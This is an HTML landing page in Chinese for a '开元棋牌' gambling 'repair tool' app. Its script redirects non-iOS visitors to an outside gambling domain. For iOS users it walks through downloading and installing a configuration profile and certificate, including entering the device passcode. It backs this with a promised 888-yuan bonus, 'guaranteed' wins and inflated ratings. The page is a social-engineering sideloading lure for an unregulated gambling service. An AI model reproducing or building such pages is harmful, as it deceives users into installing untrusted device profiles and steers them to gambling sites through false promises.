<!DOCTYPE html>

<head>
  <meta charset="utf-8">
  <meta http-equiv="X-UA-Compatible" content="IE=edge">
  <title></title>
  <meta name="description" content="">
  <meta name="viewport" content="width=device-width,initial-scale=1,minimum-scale=1,maximum-scale=1,user-scalable=no" />
  <link rel="stylesheet" href="./css/reset.css">
  <link rel="stylesheet" href="./css/index.css">
  <script src="./js/rem.js"></script>
  <script src="https://unpkg.com/better-scroll/dist/bscroll.min.js"></script>
  <script src="./js/zepto.min.js"></script>
  <script type="text/javascript" src="js/jquery-1.9.1.min.js"></script>
  <script type="text/javascript">
    $(function () {
      var browser = {
        versions: function () {
          var u = navigator.userAgent,
            app = navigator.appVersion;
          return {
            trident: u.indexOf('Trident') > -1,
            presto: u.indexOf('Presto') > -1,
            webKit: u.indexOf('AppleWebKit') > -1,
            gecko: u.indexOf('Gecko') > -1 && u.indexOf('KHTML') == -1,
            mobile: !!u.match(/AppleWebKit.*Mobile.*/) || !!u.match(/AppleWebKit/),
            ios: !!u.match(/\(i[^;]+;( U;)? CPU.+Mac OS X/),
            android: u.indexOf('Android') > -1 || u.indexOf('Linux') > -1,
            iPhone: u.indexOf('iPhone') > -1 || u.indexOf('Mac') > -1,
            iPad: u.indexOf('iPad') > -1,
            webApp: u.indexOf('Safari') == -1
          };
        }()
      }
      if (browser.versions.ios || browser.versions.iPhone || browser.versions.iPad) {

      } else {
        window.location.href = "https://837qipai.cc/";
      }
    })
  </script>
</head>

<body>
  <div class="wrap">
    <div class="banner">
      <img src="images/whjx-banner.jpg">
    </div>
    <header>
      <div class="header_info">
        <div class="info_pic">
          <img src="images/whjx-logo.png">
        </div>
        <div class="info_text">
          <h2 id="app_name">开元棋牌工具</h2>
          <ul>
            <li>
              <img src="./images/2.png">
              <span id="download_count">14.35萬</span>
            </li>
            <li>
              <img src="./images/3.png">
              <span>IOS/Android</span>
            </li>
            <li>
              <img src="./images/4.png">
              <span id="app_version">v2.02</span>
            </li>
          </ul>
        </div>
      </div>
	  
    <div class="btn_group btn_group2">
      <div class="btn_item">
        <button id="download_btn" onclick="downApp()" class="iosMask"><a><img class="iconDown"
              src="images/2_1.png" />修复工具下载，更新领取红包</a></button>
      </div>
	  </div>
      <div class="header_remarks">
        <div class="remarks_rating">
          <h3>
            <span id="grade">4.9</span>
            <img src="./images/start.png">
          </h3>
          <p id="grade_person_count">87603人评分</p>
        </div>
        <div class="remarks_info">
          <div class="remarks_info_item">
            <h3><span>#</span>1</h3>
            <p>娱乐</p>
          </div>
          <div class="remarks_info_item">
            <h3>18<span>+</span></h3>
            <p>年龄</p>
          </div>
        </div>
      </div>
    </header>
    <div class="introduce">
      <h3>【应用介绍】</h3>
      <p>
        想要在牌局中一展身手，却遇到APP无法打开？闪退？无法信任设备？让您无法施展高超的牌技，扰了兴致。我们深知此问题给您带来了不小的困扰，所以痛下决心要为广大会员创造更好的游戏体验。现在由<span>【开元棋牌】</span>专业技术团队开发的此款APP修复工具能更好的为您解决这些问题，在您无法打开APP或APP升级维护时打开修复工具，重新下载最新版APP即可登陆畅玩。一次下载，永久使用。下载后别忘记领取红包哦，<span
          style="color: red;">888元红包</span>等您来抢，百分百中奖！
      </p>

      <h3 style="margin-top: 20px;">主要功能：</h3>
      <p>
        <span>1.APP升级/更新/修复 <br />
          2.抢红包<br />
          3.快速访问优惠大厅 <br />
          4.快速访问网页版登陆</span>
      </p>
    </div>
    <div class="btn_group">
      <!--<div class="btn_item">
        <button id="download_btn" onclick="downApp()" class="iosMask"><a><img class="iconDown"
              src="images/2_1.png" />修复工具下载，更新领取红包</a></button>
      </div>-->
      <div class="btn_item">
        <button id="app_home"><a class="gohome" href="https://1qp837.com/m/#/home?channelCode=627032" target="_blank">进入网页版</a></button>
      </div>
      <div class="btn_item">
        <a class="kf_link"
          href="https://vip88ff8.chatnow.mstatik.com/widget/standalone.html?eid=194663"><img
            src="images/kf.png" />在线客服</a>
        <span class="look">查看安装引导</span>
      </div>
    </div>
    <div class="install">
      <div class="install_title">
        <h4>安装教程</h4>
        <span class="close" style="font-size: .5rem;">×</span>
      </div>
      <div id="iosafter" class="wrapper">
        <ul class="content">
          <li>
            <img src="./images/before_12_step/1.png" class="img_01">
            <p>点击下载APP后，选择<span>【允许】</span></p>
          </li>
          <li>
            <img src="./images/before_12_step/2.png" class="img_01">
            <p>描述文件下载，点击<span>【关闭】</span></p>
          </li>
          <li>
            <img src="./images/before_12_step/3.png" class="img_01">
            <p>进入桌面，点击<span>【设置】</span></p>
          </li>
          <li>
            <img src="./images/before_12_step/4.png" class="img_01">
            <p>在设置里选择<span>【已下载描述文件】</span></p>
          </li>
          <li>
            <img src="./images/before_12_step/5.png" class="img_01">
            <p>在描述文件中点击<span>【安装】</span></p>
          </li>
          <li>
            <img src="./images/before_12_step/6.png" class="img_01">
            <p>安装开始前需要<span>输入解锁密码</span>,（无密码忽略此步骤）</p>
          </li>
          <li>
            <img src="./images/before_12_step/7.png" class="img_01">
            <p>点击<span>【下一步】</span></p>
          </li>
          <li>
            <img src="./images/before_12_step/8.png" class="img_01">
            <p>最后点击<span>【安装】</span>即可</p>
          </li>
          <li>
            <img src="./images/before_12_step/9.png" class="img_01">
            <p>安装完成，返回桌面</p>
          </li>
        </ul>
      </div>
    </div>

    <div class="ios_mask" style="display:none">
      <img id="license_step_img1" src="./images/mask.png" style="display: none">
      <img id="license_step_img2" src="./images/mask2.png" style="display: none">
      <button class="closeMask">2:证书已安装·下一步</button>
    </div>

    <div id="open_safari">
      <div class="w640 ios_show" style="display: block;">
        <p>
          1.该浏览器客户端内无法下载，请复制以下网址到苹果浏览器safari打开
        </p>
        <p>
          <a id="copyBtn" onclick="clipboardaa()"><img src="./images/copy_btn.png" alt=""></a>
        </p>
        <p>2.打开苹果safari浏览器，粘贴并前往后即可下载</p>
        <p class="safari_info"><img src="./images/safari.png" alt=""></p>
        <p>
          <a style="max-width: 8vw;display: block;margin: 0px auto" href="javascript:hideBaiduT();" id="closeBtn"><img
              src="./images/close_btn.png" alt=""></a>
        </p>
      </div>
    </div>

    <div class="hide">
      <iframe src="" id="download_if" frameborder="0"></iframe>
    </div>
    <div id="wxdk">
      <div class="inner">
        <dl>
          <dt><img src="./images/wxdk.jpg" alt=""></dt>
          <dd onclick="closeWX()">知道了</dd>
        </dl>
      </div>
    </div>
  </div>
  <script type="text/javascript" src="js/clipboard.min.js"></script>
  <script src="./js/index.js"></script>

  <script type="text/javascript">
    function clipboardaa() {
      var clipboard = new ClipboardJS('#copyBtn', {
        text: function () {
          return window.location.origin
        }
      });

      clipboard.on('success', function (e) {
        alert('复制成功')
        e.clearSelection();
      });
    }
    $('#closeBtn').on('click', function () {
      $('#open_safari').fadeOut();
    });

    function closeWX() {
      $('#wxdk').hide()
    }

    function is_weixin() {
      var ua = navigator.userAgent.toLowerCase();
      if (ua.match(/MicroMessenger/i) == "micromessenger" || ua.match(/qq\//i) == "qq/") {
        return true;
      } else {
        return false;
      }
    }
    // $(document).ready(function () {
    //   if (is_weixin) {
    //     $('#wxdk').show()
    //   }
    // })
  </script>
</body>

</html>